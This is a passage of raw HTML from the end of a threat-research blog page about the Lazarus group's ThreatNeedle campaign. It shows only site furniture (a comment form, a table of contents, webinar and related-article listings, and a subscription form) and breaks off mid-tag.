value='100803' id='comment_post_ID' /> <input type='hidden' name='comment_parent' id='comment_parent' value='0' /> </p><p style="display: none;"><input type="hidden" id="akismet_comment_nonce" name="akismet_comment_nonce" value="d958995844" /></p><p style="display: none !important;" class="akismet-fields-container" data-prefix="ak_"><label>&#916;<textarea name="ak_hp_textarea" cols="45" rows="8" maxlength="100"></textarea></label><input type="hidden" id="ak_js_1" name="ak_js" value="176"/><script>document.getElementById( "ak_js_1" ).setAttribute( "value", ( new Date() ).getTime() );</script></p></form> </div><!-- #respond --> </div><!-- .entry-comments --> </div> <div class="o-col c-article__sidebar c-widgets--distributed u-hidden u-flex@md"> <div class="c-widget__wrapper"> <div class="c-highlight js-accordion is-active u-hidden u-block@md js-sticky-widget"> <div class="c-accordion-toggle js-accordion-toggle"> <div class="c-highlight__header"> <div class="c-highlight__icon"> <div class="u-block--theme-light u-hidden--theme-dark"> <img src="https://securelist.com/wp-content/themes/securelist2020/assets/images/icon/icon-categories.svg" /> </div> <div class="u-block--theme-dark u-hidden--theme-light"> <img src="https://securelist.com/wp-content/themes/securelist2020/assets/images/icon/icon-categories--invert.svg" /> </div> </div> <div class="c-highlight__title"> <p>Table of Contents</p> </div> </div> </div> <div class="js-accordion-container"> <div class="c-highlight__body"> <ul class='c-list-links'><li><a href="#initial-infection">Initial infection</a></li><li><a href="#malware-implants">Malware implants</a></li><ul class='c-list-links'><li><a href="#threatneedle-installer">ThreatNeedle installer</a></li><li><a href="#threatneedle-loader">ThreatNeedle loader</a></li><li><a href="#threatneedle-backdoor">ThreatNeedle backdoor</a></li></ul><li><a href="#post-exploitation-phase">Post-exploitation phase</a></li><ul class='c-list-links'><li><a href="#credential-gathering">Credential gathering</a></li><li><a href="#lateral-movement">Lateral movement</a></li><li><a href="#overcoming-network-segmentation">Overcoming network segmentation</a></li><li><a href="#exfiltration">Exfiltration</a></li></ul><li><a href="#attribution">Attribution</a></li><ul class='c-list-links'><li><a href="#connection-with-deathnote-cluster">Connection with DeathNote cluster</a></li><li><a href="#connection-with-operation-applejeus">Connection with Operation AppleJeus</a></li><li><a href="#connection-with-bookcode-cluster">Connection with Bookcode cluster</a></li></ul><li><a href="#conclusions">Conclusions</a></li><li><a href="#appendix-i-indicators-of-compromise">Appendix I – Indicators of Compromise</a></li><li><a href="#appendix-ii-mitre-attck-mapping">Appendix II – MITRE ATT&amp;CK Mapping</a></li></ul> </div> </div> </div> </div> <div class="c-widget__wrapper"> <div class="js-sticky-widget"> <p><span class="c-tag c-tag--primary">GReAT webinars</span></p> <div class="o-row o-row--small-gutters"> <div class="o-col-12 c-card__dividers c-card__dividers--hide-first@xs c-card__dividers--show-last@xs"> <article class="c-card c-card--hor-reverse@xs u-items-center"> <div class="c-card__body"> <header class="c-card__header"> <time datetime="2021-05-13T13:00:00+00:00" class="c-card__event-date"> 13 May 2021, 1:00pm </time> <h3 class="c-card__title c-card__title--has-icon"><a href="https://securelist.com/webinars/great-ideas-balalaika-edition/" class="c-card__title-icon"><svg class="o-icon o-svg-icon o-svg-larger"><use xmlns:xlink="http://www.w3.org/1999/xlink" xlink:href="https://securelist.com/wp-content/themes/securelist2020/assets/sprite/icons.svg#icon-webinar"></use></svg></a><a href="https://securelist.com/webinars/great-ideas-balalaika-edition/" class="c-card__link">GReAT Ideas. Balalaika Edition</a></h3> </header> <footer class="c-card__footer"> <div class="c-card__authors"> <ul class="c-list-authors c-list-authors--comma"> <li> <a href="https://securelist.com/author/borislarin/" > <span>Boris Larin</span></a> </li> <li> <a href="https://securelist.com/author/denislegezo/" > <span>Denis Legezo</span></a> </li> </ul> </div> </footer> </div> </article> <article class="c-card c-card--hor-reverse@xs u-items-center"> <div class="c-card__body"> <header class="c-card__header"> <time datetime="2021-02-26T12:00:00+00:00" class="c-card__event-date"> 26 Feb 2021, 12:00pm </time> <h3 class="c-card__title c-card__title--has-icon"><a href="https://securelist.com/webinars/great-ideas-green-tea-edition/" class="c-card__title-icon"><svg class="o-icon o-svg-icon o-svg-larger"><use xmlns:xlink="http://www.w3.org/1999/xlink" xlink:href="https://securelist.com/wp-content/themes/securelist2020/assets/sprite/icons.svg#icon-webinar"></use></svg></a><a href="https://securelist.com/webinars/great-ideas-green-tea-edition/" class="c-card__link">GReAT Ideas. Green Tea Edition</a></h3> </header> <footer class="c-card__footer"> <div class="c-card__authors"> <ul class="c-list-authors c-list-authors--comma"> <li> <a href="https://securelist.com/author/johnhultquist/" > <span>John Hultquist</span></a> </li> <li> <a href="https://securelist.com/author/brian_bartholomew/" > <span>Brian Bartholomew</span></a> </li> <li> <a href="https://securelist.com/author/suguru/" > <span>Suguru Ishimaru</span></a> </li> <li> <a href="https://securelist.com/author/vitalykamluk/" > <span>Vitaly Kamluk</span></a> </li> <li> <a href="https://securelist.com/author/seongsupark/" > <span>Seongsu Park</span></a> </li> <li> <a href="https://securelist.com/author/yusukeniwa/" > <span>Yusuke Niwa</span></a> </li> <li> <a href="https://securelist.com/author/motohikosato/" > <span>Motohiko Sato</span></a> </li> </ul> </div> </footer> </div> </article> <article class="c-card c-card--hor-reverse@xs u-items-center"> <div class="c-card__body"> <header class="c-card__header"> <time datetime="2020-06-17T13:00:00+00:00" class="c-card__event-date"> 17 Jun 2020, 1:00pm </time> <h3 class="c-card__title c-card__title--has-icon"><a href="https://securelist.com/webinars/great-ideas-powered-by-sas-malware-attribution-and-next-gen-iot-honeypots/" class="c-card__title-icon"><svg class="o-icon o-svg-icon o-svg-larger"><use xmlns:xlink="http://www.w3.org/1999/xlink" xlink:href="https://securelist.com/wp-content/themes/securelist2020/assets/sprite/icons.svg#icon-webinar"></use></svg></a><a href="https://securelist.com/webinars/great-ideas-powered-by-sas-malware-attribution-and-next-gen-iot-honeypots/" class="c-card__link">GReAT Ideas. Powered by SAS: malware attribution and next-gen IoT honeypots</a></h3> </header> <footer class="c-card__footer"> <div class="c-card__authors"> <ul class="c-list-authors c-list-authors--comma"> <li> <a href="https://securelist.com/author/marcopreuss/" > <span>Marco Preuss</span></a> </li> <li> <a href="https://securelist.com/author/denislegezo/" > <span>Denis Legezo</span></a> </li> <li> <a href="https://securelist.com/author/costin/" > <span>Costin Raiu</span></a> </li> <li> <a href="https://securelist.com/author/kurtb/" > <span>Kurt Baumgartner</span></a> </li> <li> <a href="https://securelist.com/author/dandemeter/" > <span>Dan Demeter</span></a> </li> <li> <a href="https://securelist.com/author/yaroslavshmelev/" > <span>Yaroslav Shmelev</span></a> </li> </ul> </div> </footer> </div> </article> <article class="c-card c-card--hor-reverse@xs u-items-center"> <div class="c-card__body"> <header class="c-card__header"> <time datetime="2020-08-26T14:00:00+00:00" class="c-card__event-date"> 26 Aug 2020, 2:00pm </time> <h3 class="c-card__title c-card__title--has-icon"><a href="https://securelist.com/webinars/great-ideas-powered-by-sas-threat-actors-advance-on-new-fronts/" class="c-card__title-icon"><svg class="o-icon o-svg-icon o-svg-larger"><use xmlns:xlink="http://www.w3.org/1999/xlink" xlink:href="https://securelist.com/wp-content/themes/securelist2020/assets/sprite/icons.svg#icon-webinar"></use></svg></a><a href="https://securelist.com/webinars/great-ideas-powered-by-sas-threat-actors-advance-on-new-fronts/" class="c-card__link">GReAT Ideas. Powered by SAS: threat actors advance on new fronts</a></h3> </header> <footer class="c-card__footer"> <div class="c-card__authors"> <ul class="c-list-authors c-list-authors--comma"> <li> <a href="https://securelist.com/author/ivankwiatkowski/" > <span>Ivan Kwiatkowski</span></a> </li> <li> <a href="https://securelist.com/author/maheryamout/" > <span>Maher Yamout</span></a> </li> <li> <a href="https://securelist.com/author/noushinshabab/" > <span>Noushin Shabab</span></a> </li> <li> <a href="https://securelist.com/author/pierredelcher/" > <span>Pierre Delcher</span></a> </li> <li> <a href="https://securelist.com/author/felixaime/" > <span>Félix Aime</span></a> </li> <li> <a href="https://securelist.com/author/giampaolodedola/" > <span>Giampaolo Dedola</span></a> </li> <li> <a href="https://securelist.com/author/santiago/" > <span>Santiago Pontiroli</span></a> </li> </ul> </div> </footer> </div> </article> <article class="c-card c-card--hor-reverse@xs u-items-center"> <div class="c-card__body"> <header class="c-card__header"> <time datetime="2020-07-22T14:00:00+00:00" class="c-card__event-date"> 22 Jul 2020, 2:00pm </time> <h3 class="c-card__title c-card__title--has-icon"><a href="https://securelist.com/webinars/great-ideas-powered-by-sas-threat-hunting-and-new-techniques/" class="c-card__title-icon"><svg class="o-icon o-svg-icon o-svg-larger"><use xmlns:xlink="http://www.w3.org/1999/xlink" xlink:href="https://securelist.com/wp-content/themes/securelist2020/assets/sprite/icons.svg#icon-webinar"></use></svg></a><a href="https://securelist.com/webinars/great-ideas-powered-by-sas-threat-hunting-and-new-techniques/" class="c-card__link">GReAT Ideas. Powered by SAS: threat hunting and new techniques</a></h3> </header> <footer class="c-card__footer"> <div class="c-card__authors"> <ul class="c-list-authors c-list-authors--comma"> <li> <a href="https://securelist.com/author/dimitrybestuzhev/" > <span>Dmitry Bestuzhev</span></a> </li> <li> <a href="https://securelist.com/author/costin/" > <span>Costin Raiu</span></a> </li> <li> <a href="https://securelist.com/author/pierredelcher/" > <span>Pierre Delcher</span></a> </li> <li> <a href="https://securelist.com/author/brian_bartholomew/" > <span>Brian Bartholomew</span></a> </li> <li> <a href="https://securelist.com/author/borislarin/" > <span>Boris Larin</span></a> </li> <li> <a href="https://securelist.com/author/arieljungheit/" > <span>Ariel Jungheit</span></a> </li> <li> <a href="https://securelist.com/author/fabioa/" > <span>Fabio Assolini</span></a> </li> </ul> </div> </footer> </div> </article> </div> </div> </div> </div> <div class="c-widget__wrapper"> <div class="js-sticky-widget"> <p><span class="c-tag c-tag--primary">From the same authors</span></p> <div class="o-row o-row--small-gutters"> <div class="o-col-12 c-card__dividers c-card__dividers--hide-first@xs c-card__dividers--show-last@xs"> <article class="c-card c-card--hor-reverse@xs u-items-center"> <a href="https://securelist.com/unveiling-lazarus-new-campaign/110888/" class="c-card__figure" style=""> <img width="800" height="450" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/09/23163822/sl-abstract-malicious-binary-code-1200-800x450.jpg" class="attachment-securelist-2020-thumbnail size-securelist-2020-thumbnail wp-post-image" alt="" decoding="async" loading="lazy" data-src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/09/23163822/sl-abstract-malicious-binary-code-1200-800x450.jpg" data-srcset="" srcset="" /> </a> <div class="c-card__body"> <header class="c-card__header"> <h3 class="c-card__title"><a href="https://securelist.com/unveiling-lazarus-new-campaign/110888/" class="c-card__link">A cascade of compromise: unveiling Lazarus&#8217; new campaign</a></h3> </header> </div> </article> </div> <div class="o-col-12 c-card__dividers c-card__dividers--hide-first@xs c-card__dividers--show-last@xs"> <article class="c-card c-card--hor-reverse@xs u-items-center"> <a href="https://securelist.com/the-lazarus-group-deathnote-campaign/109490/" class="c-card__figure" style=""> <img width="800" height="450" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/10/07093719/abstract_threat_actor_attribution-800x450.jpg" class="attachment-securelist-2020-thumbnail size-securelist-2020-thumbnail wp-post-image" alt="" decoding="async" loading="lazy" data-src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/10/07093719/abstract_threat_actor_attribution-800x450.jpg" data-srcset="" srcset="" /> </a> <div class="c-card__body"> <header class="c-card__header"> <h3 class="c-card__title"><a href="https://securelist.com/the-lazarus-group-deathnote-campaign/109490/" class="c-card__link">Following the Lazarus group by tracking DeathNote campaign</a></h3> </header> </div> </article> </div> <div class="o-col-12 c-card__dividers c-card__dividers--hide-first@xs c-card__dividers--show-last@xs"> <article class="c-card c-card--hor-reverse@xs u-items-center"> <a href="https://securelist.com/bluenoroff-methods-bypass-motw/108383/" class="c-card__figure" style=""> <img width="800" height="450" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/09/09131757/abstract_random_red_code-800x450.jpg" class="attachment-securelist-2020-thumbnail size-securelist-2020-thumbnail wp-post-image" alt="" decoding="async" loading="lazy" data-src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/09/09131757/abstract_random_red_code-800x450.jpg" data-srcset="" srcset="" /> </a> <div class="c-card__body"> <header class="c-card__header"> <h3 class="c-card__title"><a href="https://securelist.com/bluenoroff-methods-bypass-motw/108383/" class="c-card__link">BlueNoroff introduces new methods bypassing MoTW</a></h3> </header> </div> </article> </div> <div class="o-col-12 c-card__dividers c-card__dividers--hide-first@xs c-card__dividers--show-last@xs"> <article class="c-card c-card--hor-reverse@xs u-items-center"> <a href="https://securelist.com/kimsukys-golddragon-cluster-and-its-c2-operations/107258/" class="c-card__figure" style=""> <img width="800" height="450" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/08/24163735/kimsuky-gold-dragon_featured-800x450.jpg" class="attachment-securelist-2020-thumbnail size-securelist-2020-thumbnail wp-post-image" alt="" decoding="async" loading="lazy" data-src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/08/24163735/kimsuky-gold-dragon_featured-800x450.jpg" data-srcset="" srcset="" /> </a> <div class="c-card__body"> <header class="c-card__header"> <h3 class="c-card__title"><a href="https://securelist.com/kimsukys-golddragon-cluster-and-its-c2-operations/107258/" class="c-card__link">Kimsuky&#8217;s GoldDragon cluster and its C2 operations</a></h3> </header> </div> </article> </div> <div class="o-col-12 c-card__dividers c-card__dividers--hide-first@xs c-card__dividers--show-last@xs"> <article class="c-card c-card--hor-reverse@xs u-items-center"> <a href="https://securelist.com/the-bluenoroff-cryptocurrency-hunt-is-still-on/105488/" class="c-card__figure" style=""> <img width="800" height="450" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/01/12134602/abstract_fintech-800x450.jpg" class="attachment-securelist-2020-thumbnail size-securelist-2020-thumbnail wp-post-image" alt="" decoding="async" loading="lazy" data-src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/01/12134602/abstract_fintech-800x450.jpg" data-srcset="" srcset="" /> </a> <div class="c-card__body"> <header class="c-card__header"> <h3 class="c-card__title"><a href="https://securelist.com/the-bluenoroff-cryptocurrency-hunt-is-still-on/105488/" class="c-card__link">The BlueNoroff cryptocurrency hunt is still on</a></h3> </header> </div> </article> </div> </div> </div> </div> <div class="c-widget__wrapper"> <div class="c-widget-subscribe js-sticky-widget"> <div class="c-block__header"> <h5 class="c-title--small">Subscribe to our weekly e-mails</h5> <p>The hottest research right in your inbox</p> </div> <div class="c-form--float-labels js-float-labels"> <script type="text/javascript"></script> <div class='gf_browser_unknown gform_wrapper gform_wrapper_original_id_11 gravity-theme subscribe-mc_wrapper' id='gform_wrapper_2353393760' ><div id='gf_2353393760' class='gform_anchor' tabindex='-1'></div><form method='post' enctype='multipart/form-data' target='gform_ajax_frame_2353393760' id='gform_2353393760' class='subscribe-mc' action='/lazarus-threatneedle/100803/#gf_2353393760' > <div class="gform-content-wrapper"><div class='gform_body gform-body'><div id='gform_fields_2353393760' class='gform_fields top_label form_sublabel_below description_below'><div id="field_11_1" class="gfield gfield_contains_required field_sublabel_below field_description_below gfield_visibility_visible" ><label class='gfield_label screen-reader-text' for='input_2353393760_1' >Email<span class="gfield_required"><span class="gfield_required gfield_required_text">(Required)</span></span></label><div class='ginput_container ginput_container_email'> <input name='input_1' id='input_2353393760_1' type='text' value='' class='medium' placeholder='Email' aria-required="true" aria-invalid="false" /> </div></div><div id="field_11_3" class="gfield js-kaspersky-gform-recaptcha-placeholder gform_hidden field_sublabel_below field_description_below gfield_visibility_hidden" ><div class='ginput_container ginput_container_text'><input name='input_3' id='input_2353393760_3' type='hidden' class='gform_hidden' aria-invalid="false" value='' /></div></div><fieldset id="field_11_2" class="gfield input-without-label label-gdpr gfield_contains_required field_sublabel_below field_description_below gfield_visibility_visible" ><legend class='gfield_label screen-reader-text gfield_label_before_complex' ><span class="gfield_required"><span class="gfield_required gfield_required_text">(Required)</span></span></legend><div class='ginput_container ginput_container_checkbox'><div class='gfield_checkbox' id='input_2353393760_2'><div class='gchoice gchoice_11_2_1'> <input class='gfield-choice-input' name='input_2.1' type='checkbox' value='I agree' id='choice_2353393760_11_2_1' /> <label for='choice_2353393760_11_2_1' id='label_2353393760_11_2_1'>I agree to provide my email address to “AO Kaspersky Lab” to receive information about new posts on the site. I understand that I can withdraw this consent at any time via e-mail by clicking the “unsubscribe” link that I find at the bottom of any e-mail sent to me for the purposes mentioned above.</label> </div></div></div></fieldset></div></div> <div class='gform_footer top_label'> <button type="submit" class="gform_button button" id='gform_submit_button_2353393760' value="Sign up"> <svg class="o-icon o-svg-icon o-svg-large"><use xmlns:xlink="http://www.w3.org/1999/xlink" xlink:href="https://securelist.com/wp-content/themes/securelist2020/assets/sprite/icons.svg#icon-envelope"></use></svg> <span>Subscribe</span> </button> <input type='hidden' name='gform_ajax' value='form_id=11&amp;title=&amp;description=&amp;tabindex=0' /> <input type='hidden' class='gform_hidden' name='is_submit_11' value='1' /> <input type='hidden' class='gform_hidden' name='gform_submit' value='11' /> <input type='hidden' class='gform_hidden' name='gform_unique_id' value='' /> <input type='hidden' class='gform_hidden' name='state_11' value='WyJbXSIsImIwODQwZTA2ZGQ0NzYwODcyOTBkZjNmZDM1NDk2Y2ZkIl0=' /> <input type='hidden' class='gform_hidden' name='gform_target_page_number_11' id='gform_target_page_number_2353393760_11' value='0' /> <input type='hidden' class='gform_hidden' name='gform_source_page_number_11' id='gform_source_page_number_2353393760_11' value='1' /> <input type='hidden' name='gform_random_id' value='2353393760' /><input type='hidden' name='gform_field_values' value='securelist_2020_form_location=sidebar' /> </div> </div><p style="display: none !important;" class="akismet-fields-container" data-prefix="ak_"><label>&#916;<textarea name="ak_hp_textarea" cols="45" rows="8" maxlength="100"></textarea></label><input type="hidden" id="ak_js_2" name="ak_js" value="21"/><script>document.getElementById( "ak_js_2" ).setAttribute( "value", ( new Date() ).getTime() );</script></p></form> </div> <iframe style='display:none;width:0px;height:0px;' src='about:blank' name='gform_ajax_frame_2353393760' id='gform_ajax_frame_2353393760' title='This iframe contains the logic required to handle Ajax powered Gravity Forms.'></iframe> <script type="text/javascript"> /* <![CDATA[ */ gform.initializeOnLoaded( function() {gformInitSpinner( 2353393760, 'https://securelist.com/wp-content/themes/securelist2020/assets/images/content/ajax-spinner-red.svg' );jQuery('#gform_ajax_frame_2353393760').on('load',function(){var contents = jQuery(this).contents().find('*').html();var is_postback = contents.indexOf('GF_AJAX_POSTBACK') >= 0;if(!is_postback){return;}var form_content = jQuery(this).contents().find('#gform_wrapper_2353393760');var is_confirmation = jQuery(this).contents().find('#gform_confirmation_wrapper_2353393760').length > 0;var is_redirect = contents.indexOf('gformRedirect(){') >= 0;var is_form = form_content.length > 0 && ! is_redirect && ! is_confirmation;var mt = parseInt(jQuery('html').css('margin-top'), 10) + parseInt(jQuery('body').css('margin-top'), 10) + 100;if(is_form){jQuery('#gform_wrapper_2353393760').html(form_content.html());if(form_content.hasClass('gform_validation_error')){jQuery('#gform_wrapper_2353393760').addClass('gform_validation_error');} else {jQuery('#gform_wrapper_2353393760').removeClass('gform_validation_error');}setTimeout( function() { /* delay the scroll by 50 milliseconds to fix a bug in chrome */ jQuery(document).scrollTop(jQuery('#gform_wrapper_2353393760').offset().top - mt); }, 50 );if(window['gformInitDatepicker']) {gformInitDatepicker();}if(window['gformInitPriceFields']) {gformInitPriceFields();}var current_page = jQuery('#gform_source_page_number_2353393760_11').val();gformInitSpinner( 2353393760, 'https://securelist.com/wp-content/themes/securelist2020/assets/images/content/ajax-spinner-red.svg' );jQuery(document).trigger('gform_page_loaded', [2353393760, current_page]);window['gf_submitting_2353393760'] = false;}else if(!is_redirect){var confirmation_content = jQuery(this).contents().find('.GF_AJAX_POSTBACK').html();if(!confirmation_content){confirmation_content = contents;}setTimeout(function(){jQuery('#gform_wrapper_2353393760').replaceWith(confirmation_content);jQuery(document).scrollTop(jQuery('#gf_2353393760').offset().top - mt);jQuery(document).trigger('gform_confirmation_loaded', [2353393760]);window['gf_submitting_2353393760'] = false;wp.a11y.speak(jQuery('#gform_confirmation_message_2353393760').text());}, 50);}else{jQuery('#gform_2353393760').append(contents);if(window['gformRedirect']) {gformRedirect();}}jQuery(document).trigger('gform_post_render', [2353393760, current_page]);} );} ); /* ]]> */ </script> </div> </div> </div> <div class="c-widget__wrapper"> <div class="js-sticky-widget"> <p><span class="c-tag c-tag--primary">In the same category</span></p> <div class="o-row o-row--small-gutters"> <div class="o-col-12 c-card__dividers c-card__dividers--hide-first@xs c-card__dividers--show-last@xs"> <article class="c-card c-card--hor-reverse@xs u-items-center"> <a href="https://securelist.com/eagerbee-backdoor/115175/" class="c-card__figure" style=""> <img width="800" height="450" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/12/28082809/SL-EagerBee-backdoor-featured-800x450.jpg" class="attachment-securelist-2020-thumbnail size-securelist-2020-thumbnail wp-post-image" alt="" decoding="async" loading="lazy" data-src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/12/28082809/SL-EagerBee-backdoor-featured-800x450.jpg" data-srcset="" srcset="" /> </a> <div class="c-card__body"> <header class="c-card__header"> <h3 class="c-card__title"><a href="https://securelist.com/eagerbee-backdoor/115175/" class="c-card__link">EAGERBEE, with updated and novel components, targets the Middle East</a></h3> </header> </div> </article> </div> <div class="o-col-12 c-card__dividers c-card__dividers--hide-first@xs c-card__dividers--show-last@xs"> <article class="c-card c-card--hor-reverse@xs u-items-center"> <a href="https://securelist.com/bellacpp-cpp-version-of-bellaciao/115087/" class="c-card__figure" style=""> <img width="800" height="450" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/12/19145053/SL-Bella-featured-1-800x450.jpg" class="attachment-securelist-2020-thumbnail size-securelist-2020-thumbnail wp-post-image" alt="" decoding="async" loading="lazy" data-src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/12/19145053/SL-Bella-featured-1-800x450.jpg" data-srcset="" srcset="" /> </a> <div class="c-card__body"> <header class="c-card__header"> <h3 class="c-card__title"><a href="https://securelist.com/bellacpp-cpp-version-of-bellaciao/115087/" class="c-card__link">BellaCPP: Discovering a new BellaCiao variant written in C++</a></h3> </header> </div> </article> </div> <div class="o-col-12 c-card__dividers c-card__dividers--hide-first@xs c-card__dividers--show-last@xs"> <article class="c-card c-card--hor-reverse@xs u-items-center"> <a href="https://securelist.com/lazarus-new-malware/115059/" class="c-card__figure" style=""> <img width="800" height="450" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/12/18184101/SL-Lazarus-multi-malware-attack-featured-800x450.jpg" class="attachment-securelist-2020-thumbnail size-securelist-2020-thumbnail wp-post-image" alt="" decoding="async" loading="lazy" data-src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/12/18184101/SL-Lazarus-multi-malware-attack-featured-800x450.jpg" data-srcset="" srcset="" /> </a> <div class="c-card__body"> <header class="c-card__header"> <h3 class="c-card__title"><a href="https://securelist.com/lazarus-new-malware/115059/" class="c-card__link">Lazarus group evolves its infection chain with old and new malware</a></h3> </header> </div> </article> </div> <div class="o-col-12 c-card__dividers c-card__dividers--hide-first@xs c-card__dividers--show-last@xs"> <article class="c-card c-card--hor-reverse@xs u-items-center"> <a href="https://securelist.com/careto-is-back/114942/" class="c-card__figure" style=""> <img width="800" height="450" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/12/12093659/SL-Careto-featured-800x450.jpg" class="attachment-securelist-2020-thumbnail size-securelist-2020-thumbnail wp-post-image" alt="" decoding="async" loading="lazy" data-src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/12/12093659/SL-Careto-featured-800x450.jpg" data-srcset="" srcset="" /> </a> <div class="c-card__body"> <header class="c-card__header"> <h3 class="c-card__title"><a href="https://securelist.com/careto-is-back/114942/" class="c-card__link">Careto is back: what&#8217;s new after 10 years of silence?</a></h3> </header> </div> </article> </div> <div class="o-col-12 c-card__dividers c-card__dividers--hide-first@xs c-card__dividers--show-last@xs"> <article class="c-card c-card--hor-reverse@xs u-items-center"> <a href="https://securelist.com/apt-report-q3-2024/114623/" class="c-card__figure" style=""> <img width="800" height="450" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/11/27181956/SL-APT-report-Q3-2024-featured-2-800x450.jpg" class="attachment-securelist-2020-thumbnail size-securelist-2020-thumbnail wp-post-image" alt="" decoding="async" loading="lazy" data-src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/11/27181956/SL-APT-report-Q3-2024-featured-2-800x450.jpg" data-srcset="" srcset="" /> </a> <div class="c-card__body"> <header class="c-card__header"> <h3 class="c-card__title"><a href="https://securelist.com/apt-report-q3-2024/114623/" class="c-card__link">APT trends report Q3 2024</a></h3> </header> </div> </article> </div> </div> </div> </div> <li id="text-22" class="widget widget_text"> <div class="textwidget"><p><a href="https://www.kaspersky.com/next?icid=gl_KNext_acq_ona_smm__onl_b2b_securelist_ban_sm-team___knext___" target="_blank" rel="noopener"><img decoding="async" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/10092503/NEXT_310x420_EN_1.jpg" width="370" /></a></p> </div> </li> </div> </div> </div> </div> <div class="c-article__progress rpi-progress-bar"> <div class="c-article__progress-bar__position rpi-progress-bar__position"></div> <div class="rpi-progress-bar__percentage"></div> </div> </article> </div> </section> <section class="c-block c-block--spacing-t-small c-block--spacing-b-small@md c-block--divider-internal"> <div class="o-container-fluid"> <h5 class="c-block__title">Latest Posts</h5> <div class="o-row o-row--small-gutters@sm c-card__row c-card__row--fixed-width-down@sm js-slider-posts-mobile"> <div class="o-col-6@sm o-col-3@md"> <article class="c-card c-card--standard@xs"> <a href="https://securelist.com/starydobry-campaign-spreads-xmrig-miner-via-torrents/115509/" class="c-card__figure" style=""> <img width="800" height="450" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/02/18071941/starydobry-featured-image-800x450.jpg" class="attachment-securelist-2020-thumbnail size-securelist-2020-thumbnail wp-post-image" alt="" decoding="async" loading="lazy" data-src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/02/18071941/starydobry-featured-image-800x450.jpg" data-srcset="" srcset="" /> </a> <div class="c-card__body"> <header class="c-card__header"> <p class="c-card__headline u-hidden u-block@md"> <a href="https://securelist.com/category/malware-descriptions/" class="c-tag c-tag--primary">Malware descriptions</a> </p> <h3 class="c-card__title"><a href="https://securelist.com/starydobry-campaign-spreads-xmrig-miner-via-torrents/115509/" class="c-card__link">StaryDobry ruins New Year&#8217;s Eve, delivering miner instead of presents</a></h3> </header> <footer class="c-card__footer"> <div class="c-card__authors"> <ul class="c-list-authors c-list-authors--comma"> <li> <a href="https://securelist.com/author/tatyanashishkova/" > <span>Tatyana Shishkova</span></a> </li> <li> <a href="https://securelist.com/author/kirillkorchemny/" > <span>Kirill Korchemny</span></a> </li> </ul> </div> </footer> </div> </article> </div> <div class="o-col-6@sm o-col-3@md"> <article class="c-card c-card--standard@xs"> <a href="https://securelist.com/nigerian-scams-2024/115388/" class="c-card__figure" style=""> <img width="800" height="450" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/02/05054846/SL-nigerian-spam-featured-800x450.jpg" class="attachment-securelist-2020-thumbnail size-securelist-2020-thumbnail wp-post-image" alt="" decoding="async" loading="lazy" data-src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/02/05054846/SL-nigerian-spam-featured-800x450.jpg" data-srcset="" srcset="" /> </a> <div class="c-card__body"> <header class="c-card__header"> <p class="c-card__headline u-hidden u-block@md"> <a href="https://securelist.com/category/spam-and-phishing-mailings/" class="c-tag c-tag--primary">Spam and phishing</a> </p> <h3 class="c-card__title"><a href="https://securelist.com/nigerian-scams-2024/115388/" class="c-card__link">Investors, Trump and the Illuminati: What the &#8220;Nigerian prince&#8221; scams became in 2024</a></h3> </header> <footer class="c-card__footer"> <div class="c-card__authors"> <ul class="c-list-authors c-list-authors--comma"> <li> <a href="https://securelist.com/author/annalazaricheva/" > <span>Anna Lazaricheva</span></a> </li> </ul> </div> </footer> </div> </article> </div> <div class="o-col-6@sm o-col-3@md"> <article class="c-card c-card--standard@xs"> <a href="https://securelist.com/sparkcat-stealer-in-app-store-and-google-play/115385/" class="c-card__figure" style=""> <img width="800" height="450" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/02/05054858/SL-SparkCat-featured-800x450.jpg" class="attachment-securelist-2020-thumbnail size-securelist-2020-thumbnail wp-post-image" alt="" decoding="async" loading="lazy" data-src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/02/05054858/SL-SparkCat-featured-800x450.jpg" data-srcset="" srcset="" /> </a> <div class="c-card__body"> <header class="c-card__header"> <p class="c-card__headline u-hidden u-block@md"> <a href="https://securelist.com/category/malware-descriptions/" class="c-tag c-tag--primary">Malware descriptions</a> </p> <h3 class="c-card__title"><a href="https://securelist.com/sparkcat-stealer-in-app-store-and-google-play/115385/" class="c-card__link">Take my money: OCR crypto stealers in Google Play and App Store</a></h3> </header> <footer class="c-card__footer"> <div class="c-card__authors"> <ul class="c-list-authors c-list-authors--comma"> <li> <a href="https://securelist.com/author/dmitrykalinin/" > <span>Dmitry Kalinin</span></a> </li> <li> <a href="https://securelist.com/author/sergeypuzan/" > <span>Sergey Puzan</span></a> </li> </ul> </div> </footer> </div> </article> </div> <div class="o-col-6@sm o-col-3@md"> <article class="c-card c-card--standard@xs"> <a href="https://securelist.com/group-policies-in-cyberattacks/115331/" class="c-card__figure" style=""> <img width="800" height="450" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/01/30185252/SL-group-policies-featured-800x450.jpg" class="attachment-securelist-2020-thumbnail size-securelist-2020-thumbnail wp-post-image" 